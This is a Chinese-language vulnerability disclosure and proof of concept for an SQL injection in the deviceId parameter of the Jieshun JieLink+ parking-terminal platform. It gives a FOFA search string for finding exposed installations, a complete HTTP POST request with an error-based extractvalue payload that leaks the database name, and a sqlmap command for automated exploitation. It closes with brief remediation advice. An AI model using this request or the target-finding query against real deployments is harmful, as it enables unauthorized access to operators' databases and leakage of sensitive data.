JieLink+智能终端操作平台存在sql注入漏洞

产品简介

捷顺JeLink+智能终端操作平台(JSOTC2016 fJeLink+)是捷顺历经多年行业经验积累，集智能硬件技术视频分析技术、互联网技术等多种技术融合，基于B/S架构，实现核心业务处理模型(用户中心、投权中心财务中心中心值班室、 运维中心车行客户端等)的搭建;基于C/S架构实现岗亭收费、收费、自助服务，满足车场收费车辆特征分析处理、当班管理、业务托管、信息上报等现场业务处理。通过视窗角色化控制远程化的新架构系统，具备定制性高、可塑性强、安全性高、扩展性强、实施交付快、交互体验简洁等特性;构建从实施、交付、运维、服务、用户体验、用户赋能等全方面实现质的飞跃的新一代智能终端操作平台解决方案

漏洞概述

jieLink+智能终端操作平台deviceId参数存在sql注入漏洞，攻击者利用此漏洞可导致数据库的敏感信息泄露。

指纹识别

fofa:

title="JieLink+智能终端操作平台"

漏洞利用

poc:

POST /mobile/Remote/GetParkController HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: DefaultSystem=Mobile; ASP.NET_SessionId=533gfzuselgriachdgogkug5
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
 
deviceId=1'and/**/extractvalue(1,concat(char(126),database()))and'

查询当前数据库

保存数据包，使用sqlmap验证

python sqlmap.py -r sql.txt --batch

修复建议

1.查询代码使用预编译语句
2.部署Web应用防火墙，对数据库操作进行监控

【故事是一把双刃剑。】